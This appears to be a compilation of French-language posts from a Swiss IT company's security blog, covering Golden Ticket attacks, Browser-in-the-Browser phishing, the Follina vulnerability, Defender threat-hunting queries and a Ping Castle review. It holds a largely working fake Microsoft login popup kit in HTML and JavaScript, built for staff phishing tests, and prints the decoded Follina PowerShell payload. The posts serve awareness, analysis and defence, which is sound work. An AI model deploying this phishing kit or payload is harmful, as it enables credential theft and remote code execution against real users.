Cet article va se concentrer autour de l'aspect Golden Ticket et Kerberos

Fonctionnement

Cette faille de sécurité utilise le compte de service KRBTGT qui est nécessaire dans la distribution de ticket dans le protocole Kerberos afin d'octroyer des droits à des services après authentification d'un utilisateur.

Avant l'octroi d'un ticket (TGT) au client par le serveur d'authentification (AS), le centre de distribution de clés (KDC) va le chiffrer en utilisant le mot de passe haché du compte KRBTGT. Ce hash est partagé entre tous les contrôleurs d'un même domaine afin de déchiffrer les "tickets" reçu des clients

L'attaque Golden Ticket consiste à générer sans le KDC un TGT, c'est-à-dire s'autoriser l'accès à des services sans passer par le serveur d'authentification. L'attaquant à besoin pour cela de 4 éléments (les 3 premiers points sont publiquement connus dans le domaine):

• FQDN (Fully Qualified Domain Name) du domaine

• SID (Security Identifier) du domaine

• Nom d'utilisateur du compte dont on veut usurper l'identité

• Hash du mot de passe KRBTGT

Pour avoir un ticket légitime, il faut encore récupérer ce hash pour pouvoir chiffrer le TGT et l'utiliser pour accéder aux différents services.

Récupération du hash

Plusieurs méthodes s'offrent aux attaquants pour accéder à ce mot de passe afin d'obtenir ce précieux hash

• Voler le fichier NTDS.DIT

• Compromettre un poste de travail

• Utiliser mimkatz

• Mettre en place une attaque DCSync

Le développement des ces points est laissé au soin du lecteur.

Comment se protéger

Comme proposé par Ping Castle, une des premières mesures à mettre en place est la rotation régulière du mot de passe du compte KRBTGT au minimum 2x par année et au mieux 40 jours (recommendation ANSSI). Un script est mis à disposition pour activer cette rotation

Les autres mesures possibles sont:

• Minimisez le nombre de comptes qui peuvent accéder au hachage du mot de passe

• Réduire au minimum les possibilités pour les attaquants de voler des informations d'identification privilégiées

• Surveiller l'infrastructure IT afin de détecter des TGT avec des longues durées de vies ou des changements de privilèges par exemple (si le privilège debug est activé)

Une faille critique?

L'anomalie de sécurité Golden ticket détectée permet si elle est exploitée d'accéder à des services à la place d'une autre personne mais il faut pour cela avoir les 4 éléments dont le hash du compte de service.

Ping Castle marque ce risque comme haut mais pour limiter l'exploitation de cette faille il suffit de mettre en place la rotation du mot de passe du compte de service KRBTGT qui normalement ne devrait pas impacter le fonctionnement des accès car ce compte n'est utilisé que pour octroyer les tickets.

A propos de l'auteur

Sven Rouvinez Ex-Network and Security Engineer @ Dina | The Swiss IT Company

Références

• https://pingcastle.com

• https://blog.quest.com/golden-ticket-attacks-how-they-work-and-how-to-defend-against-them/

• https://beta.hackndo.com/kerberos-silver-golden-tickets/

Les limites de la sensibilisation des collaborateurs

Bien que de nombreuses entreprises soient conscientes de l'importance de former et sensibiliser leurs collaborateurs aux bonnes pratiques liées à l'utilisation des outils informatiques, ce genre de sensibilisation a ses limites.

Pour détecter les tentatives de phishing, nous enseignons les bonnes pratiques suivantes aux collaborateurs:

• Contrôler l'e-mail de l'expéditeur. Ne pas se fier au nom affiché

• Faire attention au domaine de l'expéditeur (faux jumeaux, utilisations d'extension alternatives, etc.)

• Faire attention au contenu du mail (notions de sécurité, facteur d'urgence, pression hiérarchique, demande d'informations personnelles, incitation à saisir des données dans un formulaire)

• Pièce jointe inattendue en provenance d'un utilisateur non vérifié ?

• Faire attention aux liens raccourcis

Tout ceci est nécessaire et permet aux collaborateurs de détecter la majorité des tentatives de phishing. Mais alors, comment les hackers pourraient déjouer ce genre de contrôles ?

Les URL - Faciles à contrôler ?

Les collaborateurs comprennent rapidement l'importance de contrôler les URL lorsqu'ils sont redirigés sur un site web. Cependant, la technique Browser-in-The-Browser permet de complexifier ce point de contrôle.

En effet, cette technique va permettre d'afficher une URL valide à l'utilisateur dans le but de lui faire baisser sa rigueur d'analyse.

BitB - C'est quoi exactement ?

C'est une technique de phishing qui consiste à simuler une page web à l'intérieur d'une page web réelle. Elle tire avantage des fenêtres d'authentifications de prestataires tiers comme Google ou Facebook que certains site web proposent d'utiliser pour se connecter sur leur applications. Bien que nous ne recommandons de ne pas utiliser cette méthode, de nombreux utilisateurs le font par simplicité (ils n'ont pas besoin de créer un compte manuellement sur le site web en question). Les plus connus sont :

• Sign in with Google

• Sign in with Facebook

• Sign in to your account (Microsoft)

Voici un exemple réel lorsqu'on essaie de se connecter sur le portail client Roomz.io par exemple. Le site nous propose de se connecter avec différents types de comptes :

Et voici ce que l'on voit si on choisit d'utiliser son compte Microsoft. On est invité à saisir son e-mail, puis son mot de passe.

Certaines pages de connexion sont un peu différentes, mais l'idée reste la même. On remarque que l'URL du navigateur pointe bien sur login.microsoftonline.com et une fois connecté, l'utilisateur est redirigé vers le site d'origine.

BitB - Exemple réel - Login PRTG

Bref, passons à la pratique ! Les utilisateurs de PRTG, logiciel de Monitoring d'infrastructure, peuvent utiliser le service d'authentification de Microsoft pour se connecter sur l'application.

Lorsqu'un utilisateur clique sur le bouton Log in with single sign-on, un popup Microsoft s'affiche et invite l'utilisateur à saisir son e-mail, puis son mot de passe. Si la combinaison est correcte, il est connecté sur l'application.

Voici la page que nous avons été capable de faire chez CISEL pour tenter de piéger nos collaborateurs sur ce service.

On remarque que le domaine utilisé dans cette attaque utilise la technique des faux jumeaux pour tromper le domaine de CISEL (utilise un "i" à la place du "L"). Si l'utilisateur ne remarque pas ceci, la page de login est pratiquement impossible à identifier comme frauduleuse. En effet, on peut voir que le domaine est bien celui de Microsoft.

Bref, comment ça fonctionne ?

Premièrement, le but est de recréer la fenêtre du navigateur. Vu que la majorité des navigateurs utilisent un layout similaire, il s'agit d'avoir une barre de titre, une barre avec l'URL et le contenu en dessous.

Exemple de structure de la fenêtre

<button id="trigger" type="button">trigger</button>
<div id="bitb" class="w:window" style="display: none; position: fixed; top: calc(50vh - 660px / 2); left: calc(50vw - 540px / 2)">
   <div class="w:title-bar-width">
      <div id="draggable" class="w:title-bar">
         <!-- Title bar with title and controls -->
         <div class="w:title">
            <img src="./svg/logo.svg" width="20px" height="15px" class="w:logo" alt="windows icon">
            <span class="w:logo-description">Sign in to your account</span>
         </div>
         <div class="w:controls">
            <!-- Control group -->
            <div id="minimize" class="w:minimize-wrapper">
               <span class="w:minimize"></span>
            </div>
            <div id="maximize" class="w:maximize-wrapper">
               <span class="w:maximize"></span>
            </div>
            <div id="exit" class="w:exit-wrapper">
               <span class="w:exit"></span>
            </div>
         </div>
      </div>
      <div class="w:url-bar">
         <!-- Url bar with padlock -->
         <div class="w:ssl-padlock-wrapper"><span class="w:ssl-padlock"></span></div>
         <span class="w:domain-name">domain.com</span>
         <span class="w:domain-path">/path/here</span>
         <div class="w:url-end-wrapper">
            <span class="w:url-end"></span>
         </div>
      </div>
   </div>
   <!-- Content -->
   <iframe src='https://phishing.com/get/phished' class="w:content" title="example portal"></iframe>
</div>

Le plus simple pour avoir une fenêtre réutilisable est d'utiliser une iframe pour le contenu et d'importer le CSS dynamiquement avec du JavaScript en détectant le navigateur et le système d'exploitation.

**Détection OS, Browser et chargement du CSS **

document.addEventListener('DOMContentLoaded', async () => {
   // Detection du navigateur
   const agent = navigator.userAgent
   let browser = 'chrome'
   switch (true) {
      case Boolean(agent.match(/edg/i)):
         browser = 'edge'
         break
      case Boolean(agent.match(/opr\//i)):
         browser = 'opera'
         break
      case Boolean(navigator.brave):
         browser = 'brave'
         break
      case Boolean(agent.match(/firefox|fxios/i)):
         browser = 'firefox'
         break
   }
   // Detection du système d'exploitation (nécessite un context sécurisé (https))
   let os = 'windows10'
   try {
      let ua = await navigator.userAgentData.getHighEntropyValues(['platformVersion'])
      if (ua.platform === 'Windows') {
         let ver = parseInt(ua.platformVersion.split('.')[0])
         if (ver >= 13) os = 'windows11'
      }
   } catch {}
   // Chargement du css
   let link = document.createElement('link')
   link.rel = 'stylesheet'
   link.type = 'text/css'
   link.href = `/${os}/${browser}.css`
   document.getElementsByTagName('head')[0].appendChild(link)
})

En recréant notre propre fenêtre, on peut fausser les informations qui devraient habituellement alerter l'utilisateur tel que l'URL et le cadenas indiquant un certificat SSL valide.

Une fois que la fenêtre est créée, il faut s'occuper de son comportement, c'est-à-dire :

• Déplacement

• Fermer/ouvrir la fenêtre

• Maximiser/minimiser

Pour le déplacement, la fenêtre est en 'position : fixed' et ses coordonnées changent lorsque l'utilisateur déplace (drag) la barre de titre.

Gestion du déplacement de la fenêtre

let drag = false
let x = 0
let y = 0
let bitb = document.querySelector('#bitb')

// gère le movement de la fenetre.
// inspiré par https://www.w3schools.com/howto/howto_js_draggable.asp
function move(element, event) {
   element.style.left = (element.offsetLeft - x + event.clientX) + "px"
   element.style.top = (element.offsetTop - y + event.clientY) + "px"
   x = event.clientX
   y = event.clientY
}

// Initialisation du déplacement
document.querySelector('#draggable').addEventListener('mousedown', (e) => {
   x = e.clientX
   y = e.clientY
   drag = true
})

// Déplacement de la fenêtre
window.addEventListener('mousemove', (e) => {
   if (drag) move(bitb, e)
})

// Fin du déplacement
window.addEventListener('mouseup', (e) => {
   drag = false
})

Pour faire apparaitre/disparaitre la fenêtre, le plus simple est de changer sa propriété 'display' de 'none' à 'block' et vice versa.

Affichage et cachage de la fenêtre

// Fonctions generiques pour afficher/cacher un element
// Il aurait aussi été possible d'utiliser une classe au lieu d'un style inline
function show(element) {
   element.style.removeProperty('display');
}

function hide(element) {
   element.style.display = 'none'
}

document.querySelector('#trigger').addEventListener('click', () => {
   show(bitb)
})

document.querySelector('#exit').addEventListener('click', () => {
   hide(bitb)
})

La fonctionnalité de maximisation de la fenêtre peut facilement être implémentée avec l'api fullscreen du navigateur, tandis que la minimisation est plus problématique, car nous ne pouvons pas ajouter cette fenêtre à la barre de tache de l'utilisateur. Notre solution est de simuler l'animation et de fermer la fenêtre.

Maximisation et minimisation

// Maximisation avec l'api fullscreen
document.querySelector('#maximize').addEventListener('click', () => {
   if (document.fullscreenElement != bitb) {
      bitb.requestFullscreen()
   } else {
      document.exitFullscreen()
   }
})

// Minimisation en applicant la class minimized le temps de la transition.
// w:minimized fait une translation en hauteur sur une durée de 300ms
document.querySelector('#minimize').addEventListener('click', () => {
   bitb.classList.add('w:minimized')
   setTimeout(() => {
      bitb.style.display = 'none'
      bitb.classList.remove('w:minimized')
   }, 300);
})

Finalement, il reste quelques fonctionnalités à implémenter pour augmenter l'immersion de l'utilisateur.

• Décourager l'utilisateur à utiliser le site en arrière-plan

• Simuler la connexion SSO

Pour décourager l'utilisateur à utiliser le site en arrière-plan, nous pouvons assombrir le contenu avec un filtre, ou en affichant une animation de chargement.

Encore un peu de fine-tunning

/* css pour la couverture du fond */
.cover {
    position: fixed;
    z-index: 2000;
    top: 0px;
    right: 0px;
    bottom: 0px;
    left: 0px;
    background-color: rgba(0, 0, 0, 0.3);
    display: flex;
    align-items: center;
    justify-content: center;
}

/* css du spinner sur https://tobiasahlin.com/spinkit/ */

<!-- Cover ajoutée à la page -->
<div id="cover" class="cover" style="display: none">
   <div class="sk-chase">
      <div class="sk-chase-dot"></div>
      <div class="sk-chase-dot"></div>
      <div class="sk-chase-dot"></div>
      <div class="sk-chase-dot"></div>
      <div class="sk-chase-dot"></div>
      <div class="sk-chase-dot"></div>
   </div>
</div>

// Logique d'apparition de la cover
let cover = document.querySelector('#cover')

// ajout de l'apparition de la cover à l'evenement déjà existant
openTrigger.addEventListener('click', () => {
   show(bitb)
   show(cover)
})

// ajout de la disparition de la cover à l'evenement déjà existant
closeTrigger.addEventListener('click', () => {
   hide(bitb)
   hide(cover)
})

Pour simuler la connexion SSO, nous utilisons Window.postMessage pour notifier la page principale qu'elle peut rediriger l'utilisateur sur la page officielle ou fermer la fenêtre et afficher un message d'erreur.

Simulation de connexion SSO

// dans le document en iframe
document.querySelector('#close').addEventListener('click', () => parent.postMessage('close'))

// dans la page principale
window.addEventListener('message', (event) => {
   if (event.data == 'close') {
      hide(bitb)
      hide(cover)
      // redirection ou affichage d'une erreur comme retour à l'utilisateur
   }
})

Pour finir, il faut être conscient que cette technique a plusieurs limitations.

• La fenêtre est contrainte au navigateur. Si le navigateur bouge ou change de taille, la fenêtre sera impactée.

• Elle n'est pas applicable aux mobiles

• Les performances peuvent laisser à désirer

• Elle dépend de la crédibilité de la page d'origine.

Conclusion

Le phishing reste un vecteur d'attaque très utilisé et aucune société, peu importe sa taille ou son domaine d'activité, n'est épargnée. Former ses collaborateurs avec des programmes de sensibilisation continus est essentiel et ne doit pas être négligé. Vos collaborateurs ne doivent pas être le maillon faible de votre sécurité, mais ils doivent devenir votre partenaire principal en terme de sécurité de l'information.

A propos des auteurs

Cyrill GremaudSecurity Solutions Architect @ Dina | The Swiss IT Company

Kenan AugsburgerStagiaire en sécurité @ Dina | The Swiss IT Company

Points essentiels

Voici les éléments principaux à connaître concernant la vulnérabilité Follina

• MSDT = Microsoft Support Diagnostic Tool. Utilitaire pour collecter des données qui seront ensuite analysées par Microsoft pour résoudre un incident

• C'est un 0-day. Il n'y a pas de patch disponible --> Update 14.06.22 : Patch dispo !

• Permet une exécution de code à distance

• Des mitigations sont disponibles, notamment par une modification d'une clé de registre

• La simple ouverture d'un fichier Word en mode "Preview" permet d'exploiter la vulnérabilité.

• Numéro de CVE : 2022-30190

Un patch est disponible !

Le 14 juin, Microsoft a publié un patch de sécurité qui permet de combler la faille sur les environnements Windows 10 et 11. Le numéro de la KB peut varier en fonction du système d'exploitation. Plus d'informations sont disponibles sur le site de Microsoft.

Mitigation via le Registre Windows

Avant la sortie du patch, il était possible de mitiger l'exploitation de cette vulnérabilité en modifiant une valeur du registre afin d'empêcher les appels à l'outil de diagnostic via un lien.

1. Ouvrir un invite de commande (CMD.exe) en tant qu'administrateur

2. Faire une sauvegarde de la clé de registre :

3. Supprimer le clé

Ceci va permettre de désactiver l'utilisation de l'appel de MSDT via une URL ms-msdt://

Technical Deep Dive

L'équipe de sécurité CISEL s'est penché sur le fonctionnement détaillé de cette vulnérabilité. Pour réaliser ces analyses poussées, nous avons obtenu un fichier Word malveillant qui avait été initialement mis à disposition par nao_sec sur Twitter et avons examiné sa structure et son contenu grâce à Kali Linux.

Le fichier Word que nous avons analysé contient de nombreux blocs XML ainsi qu'un fichier .rels (XML Relationship) qui contenait une référence externe vers un site web.

Ce fichier .rels contient une référence vers un fichier HTML

Au moment où l'on écrit ces lignes, la ressource web n'était plus disponible, mais nous avons pu retrouver le fichier en question grâce à une analyse any.run qui avait été faite par nao_sec

Le fichier RDF842l.html contenait un bloc de code javascript exécutant la commande suivante :

On ne voit pas dans cette capture, mais le fichier HTML contenait de nombreux caractères "A" interprétés comme des commentaires et qui sont en fait nécessaires pour exploiter la faille (4096 bytes de padding nécessaire).

En analysant le code, on remarque que l'appel de ms-msdt est utilisé avec le paramètre IT_BrowseForFile qui inclut un appel PowerShell. On remarque rapidement une chaine de caractères encodée en Base64.

JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw==

Voici ce qu'elle contient une fois décodée et mise en forme:

$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe";

Voici les étapes clés de cet appel.

1. Démarre 2 cmd.exe en mode caché

2. Stoppe le processus msdt.exe s'il est présent grâce à taskkill /f

3. Effectue une recherche de fichier à l'intérieur d'un fichier .rar à la recherche d'une chaine de caractère encodée en Base64 (TVNDRgAAAA) qui s'avère être un fichier .CAB.

4. Stock ce fichier CAB encodé dans le fichier 1.t

5. Décode (grâce à certutil) le fichier CAB et le stocke dans le fichier 1.c

6. Exécute le fichier rgb.exe qu'il a trouvé dans le fichier 1.c.

Ce que fait le fichier rgb.exe ne nous intéresse pas forcément, mais l'élément important à retenir c'est qu'il s'agit réellement d'une nouvelle technique d'accès initial (MITRE TA0001) qui permet à un attaquant d'exécuter du code en un seul click (voir moins).

Ce vecteur d'attaque est intéressant, car il utilise un document Word sans Macro pour déclencher des signes habituels de Warning aux utilisateurs, mais avec la possibilité d'exécuter du code à distance. Voici un résumé de la stratégie de l'attaquant :

• Création d'un Word avec un lien vers un objet externe malicieux grâce au fichier word/_rels/document.xml.rels

• Le fichier malicieux sert à appeler ms-msdt:// en lui passant des paramètres malicieux qui permettront d'exécuter du code sur la victime.

Détection et prévention

CISEL propose des solutions EPP et EDR délivrées avec Microsoft Defender ou Kaspersky. Ces deux solutions sont capables de détecter et de bloquer la majorité des attaques exploitant la vulnérabilité Follina.

Microsoft Defender Antivirus (MDAV) possède les signatures suivantes :

• Trojan:Win32/Mesdetty.A

• Trojan:Win32/Mesdetty.B

• Behavior:Win32/MesdettyLaunch.A!blk

• Trojan:Win32/MesdettyScript.A

• Trojan:Win32/MesdettyScript.B

Il faut simplement s'assurer que le module Cloud-delivered protection and automatic sample submission est activé.

Pour les clients ayant la version EDR de Microsoft (Microsoft Defender for Endpoint), les alertes suivantes sont remontées:

• Suspicious behavior by an Office application

• Suspicious behavior by Msdt.exe

Une règle ASR nommée Block all Office applications from creating child processes permet de bloquer la création de processus enfant par une application Office telle que Word.

Kaspersky Security for Endpoint détecte et bloque également les tentatives d'exploitation avec les signatures suivantes :

• PDM:Exploit.Win32.Generic

• HEUR:Exploit.MSOffice.Agent.n

• HEUR:Exploit.MSOffice.Agent.gen

• HEUR:Exploit.MSOffice.CVE-2017-0199.a

• HEUR:Exploit.MSOffice.CVE-2021-40444.a

• HEUR:Exploit.MSOffice.Generic

Références

• https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190

• https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/

A propos de l'auteur

Cyrill GremaudSecurity Solutions Architect @ Dina | The Swiss IT Company

Threat Hunting - Kesako ?

Le Threat Hunting est une technique qui consiste à rechercher proactivement des cybermenaces qui sont présentes dans un réseau mais n’ont pas encore été détectées. Cela est particulièrement utile pour mener des investigations lorsqu'on soupçonne une attaque ou que l'on désire faire une levée de doute.

Grâce à une analyse approfondie, il est possible d'identifier des éventuels IOC (Indicators of Compromise) qui prouveraient que nous avons été victime d'une cyber-attaque.

Chez CISEL, ça se passe comment ?

Grâce à notre service Managed Endpoint Protection qui inclut une couche EDR en complément de l'EPP traditionnel, nos clients bénéficient d'une protection en temps réel, mais également d'une meilleure réponse à incident grâce à l'EDR qui offre les outils nécessaires pour investiguer de manière proactive ou alors réactive suite à une suspicion d'incident.

Registre des requêtes

Avec plus de 2'000 postes de travail et serveurs sous gestion, les équipes opérationnelles de CISEL ont l'habitude d'utiliser le module de Threat Hunting de Microsoft Defender for Endpoint pour identifier des IOC. Les chapitres ci-dessous listent les requêtes les plus utiles. Le langage utilisé est Kusto (KLQ)

Abonnez-vous au blog pour recevoir les updates concernant cet article !

Detect Hidden PowerShell Windows

Les fenêtres PowerShell cachées sont souvent des indicateurs précieux, car il n'y a en principe pas de raison de cacher ce type de fenêtre. Les logiciels malveillants aiment cacher ce genre de fenêtre.

// Finds all PowerShell execution events wherein the PowerShell window has been explicitly hidden.
DeviceProcessEvents
| where Timestamp > ago(7d)
| where InitiatingProcessFileName =~ "powershell.exe"
| where InitiatingProcessCommandLine has "-Command"
| where InitiatingProcessCommandLine has "-w hidden" or InitiatingProcessCommandLine has "-windowstyle hidden"
| project Timestamp, DeviceName, InitiatingProcessCommandLine
| top 100 by Timestamp

Log4Shell Identification

Dans le cas du fameux Log4Shell, une des difficultés pour l'IT était d'identifier rapidement quelles applications utilisaient la librairie log4j. Cette requête peut grandement aider.

// Find software that use log4j library
DeviceTvmSoftwareInventory
| where SoftwareName contains "log4j"
| project DeviceName, SoftwareName, SoftwareVersion

CVE vulnerable software

Dans la majorité des cas, une vulnérabilité est associée à un numéro spécifique de CVE. Il est possible d'utiliser ce numéro de CVE pour identifier les applications vulnérables.

//Software vulnerable to specific CVE
DeviceTvmSoftwareVulnerabilities
| where CveId contains "CVE-2021-44228"
| distinct DeviceName, OSPlatform, SoftwareVendor, SoftwareName, SoftwareVersion

Detecting specific outgoing connexion

Dans le cas de certaines attaques, certains IOC sont connus et sans solution centralisée, il est impossible de connaître quels équipements ont établi une connexion sortante vers des IP spécifiques. Cette requête permet d'identifier quel équipement et quel processus en question a établi une connexion sortante.

//List all device who made outgoing connection to specific IP
DeviceNetworkEvents
| where RemoteIP in~ (  "8.8.8.8", "1.1.1.1" )
| where Timestamp > ago(15d)
| project Timestamp, DeviceName, RemoteIP, RemotePort, Protocol, InitiatingProcessFileName

A propos de l'auteur

Cyrill GremaudSecurity Solutions Architect @ Dina | The Swiss IT Company

Ping Castle offre une méthodologie complète des outils pour couvrir le spectre complet d'un AD Microsoft. Son avantage est d'être libre et donc de pouvoir valider le code simplement.

Cet article va se concentrer sur la fonctionnalité principale Healthcheck

L'installation est très simple et il suffit d'avoir un système d'exploitation Windows, un compte de domaine (domain User ) et de décompresser le fichier pour exécuter le programme

Healthcheck

Ce type d'audit permet de connaître rapidement l'état de santé d'un Active Directory en fournissant un rapport sous forme HTML (Web) ou PDF

Indicators

Basé sur 4 indicateurs, cette section offre une vue globale des éléments qui composent ce rapport.

• Stale Object: représente tout ce qui concerne les objets (création d'ordinateurs et d'utilisateurs, délégation) AD et leur cycle de vie

• Privileged Accounts: concerne les administrateurs du domaine, par exemple mot de passe d'un compte administrateur domaine qui date de plus de 3 ans

• Trusts: si plusieurs domaines sont liés ensemble, cet indice va permettre de connaître les liens entre eux

• Anomalies: tout ce qui ne rentre pas dans les catégories précédentes. Par exemple, les processus de contrôle de sécurité

Risk model

La modélisation des risques est très utile pour connaître les menaces actuelles de l'Active Directory

La mesure associée peut être obtenue en cliquant sur le risque détecté

Maturity Level

Ce niveau permet de connaître les mauvaises configurations et ce qu'il faut corriger pour atteindre un niveau correct

MITRE ATT&CK®

Cette section est évaluée selon la base de connaissance MITRE ATT&CK® pour identifier les failles présentes sur le système

Un élément intéressant est la partie mitigation qui permet savoir comment corriger les vulnérabilités

Outil indispensable ?

Ping Castle est un produit intéressant pour les audits de sécurité car il permet d'obtenir une vision complète de l'état d'un Active Directory et apporte des éléments de correction. Un niveau de détail très précis est mis à disposition afin de connaître réellement quelles sont les vulnérabilités présentes sur le système et des pistes pour les corriger dans le but d'aider les administrateurs à protéger leur AD

Références

• https://pingcastle.com/

A propos de l'auteur

Sven Rouvinez Network and Security Engineer @ Dina | The Swiss IT Company